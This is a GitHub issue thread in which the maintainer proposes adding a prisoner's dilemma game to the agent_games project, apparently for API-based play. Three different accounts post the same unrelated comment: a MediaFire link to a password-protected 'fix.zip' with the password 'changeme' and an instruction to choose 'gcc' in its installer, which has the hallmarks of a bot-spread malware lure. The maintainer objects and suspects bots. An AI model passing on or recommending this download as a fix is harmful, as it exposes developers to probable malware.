### ISSUE TITLE
Add the prisoners dilemma game

### ISSUE THREAD

**Issue by SanjinDedic** [SanjinDedic/agent_games#65]
this does not include quality verbose feedback just the game working via api

MUST refactor how the games work with assign points (as its not needed for this game)

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SanjinDedic** [comment]
@pilot5657 hi sorry feel free to contribute, but dont post random links our issues

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SanjinDedic** [comment]
If I get a response to this we have a bot issue

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SanjinDedic** [comment]
commpleted
